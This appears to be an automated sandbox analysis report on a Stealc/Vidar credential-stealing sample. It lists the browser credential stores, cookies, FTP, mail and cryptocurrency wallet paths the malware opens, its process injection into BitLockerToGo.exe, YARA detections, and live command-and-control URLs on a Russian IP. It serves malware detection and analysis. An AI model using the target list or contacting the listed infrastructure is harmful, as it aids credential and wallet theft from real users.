Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 2736, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 1.2.BitLockerToGo.exe.2750000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.227a000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.2418000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.23ca000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.23ca000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.227a000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.2418000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BitLockerToGo.exe.2750000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1843071659.0000000002418000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1842034533.00000000021D6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1843071659.000000000227A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1843071659.00000000023CA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 2736, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 2736, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C9E0C40 sqlite3_bind_zeroblob, 1_2_6C9E0C40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C9E0D60 sqlite3_bind_parameter_name, 1_2_6C9E0D60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C908EA0 sqlite3_clear_bindings, 1_2_6C908EA0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1538409 Sample: 5ffe9c7df144e58c04f8d77c338... Startdate: 21/10/2024 Architecture: WINDOWS Score: 100 24 Suricata IDS alerts for network traffic 2->24 26 Found malware configuration 2->26 28 Malicious sample detected (through community Yara rule) 2->28 30 6 other signatures 2->30 6 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe 2->6         started        process3 signatures4 32 Found many strings related to Crypto-Wallets (likely being stolen) 6->32 34 Writes to foreign memory regions 6->34 36 Allocates memory in foreign processes 6->36 38 Injects a PE file into a foreign processes 6->38 9 BitLockerToGo.exe 33 6->9         started        process5 dnsIp6 22 147.45.44.221, 49732, 80 FREE-NET-ASFREEnetEU Russian Federation 9->22 14 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 9->14 dropped 16 C:\Users\user\AppData\...\softokn3[1].dll, PE32 9->16 dropped 18 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 9->18 dropped 20 9 other files (none is malicious) 9->20 dropped 40 Tries to steal Mail credentials (via file / registry access) 9->40 42 Found many strings related to Crypto-Wallets (likely being stolen) 9->42 44 Tries to harvest and steal ftp login credentials 9->44 46 5 other signatures 9->46 file7 signatures8
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
147.45.44.221
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://147.45.44.221/3538548809da56b2/msvcp140.dll true
    		unknown
    http://147.45.44.221/3538548809da56b2/vcruntime140.dll true
      		unknown
      http://147.45.44.221/3538548809da56b2/mozglue.dll true
        		unknown
        http://147.45.44.221/3538548809da56b2/sqlite3.dll true
          		unknown
          http://147.45.44.221/28166bd28a5d19e6.php true
            		unknown
            http://147.45.44.221/ true
              		unknown
              http://147.45.44.221/3538548809da56b2/nss3.dll true
                		unknown
                http://147.45.44.221/3538548809da56b2/softokn3.dll true
                  		unknown
                  http://147.45.44.221/3538548809da56b2/freebl3.dll true
                    		unknown